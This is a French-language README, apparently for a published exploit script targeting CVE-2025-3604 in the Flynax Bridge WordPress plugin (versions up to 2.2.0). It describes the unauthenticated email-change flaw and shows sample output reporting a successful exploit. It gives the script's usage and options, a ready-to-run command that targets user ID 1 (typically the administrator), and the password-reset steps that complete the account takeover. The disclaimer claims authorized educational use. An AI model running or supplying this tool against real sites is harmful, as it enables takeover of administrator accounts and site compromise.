
Flynax Bridge <= 2.2.0 - Escalade de privilèges non authentifiée via la prise de contrôle de compte
Le plugin Flynax Bridge pour WordPress est vulnérable à l'escalade de privilèges via la prise de contrôle du compte dans toutes les versions jusqu'à 2.2.0 incluse.
Cela est dû au fait que le plugin ne valide pas correctement l'identité d'un utilisateur avant de mettre à jour ses informations de compte (comme l'e-mail). En conséquence, des attaquants non authentifiés peuvent modifier l'adresse e-mail de n'importe quel utilisateur, y compris les administrateurs, puis initier une réinitialisation du mot de passe pour prendre complètement le contrôle du compte.
CVE: CVE-2025-3604
CVSS: 9.8 (Critique)
Publié: 23 avril 2025
Dernière mise à jour: 24 avril 2025
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
Après une exploitation réussie, l'attaquant peut se rendre sur la page de connexion WordPress et cliquer sur "Mot de passe perdu ?" en utilisant le nouvel e-mail défini pour réinitialiser le mot de passe et obtenir un accès complet au compte ciblé.
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID
WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-mail, --newmail NEWMAIL
New email to set
-id, --user_id USER_ID User ID to exploit
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"
-u: URL de base du site WordPress.-id: ID de l'utilisateur à cibler (généralement 1 pour l'admin).-mail: Nouvel e-mail qui sera défini pour cet utilisateur.À utiliser à vos risques et périls. Uniquement à des fins de tests autorisés et éducatifs.
PAR : Nxploited ( Khaled_alenazi )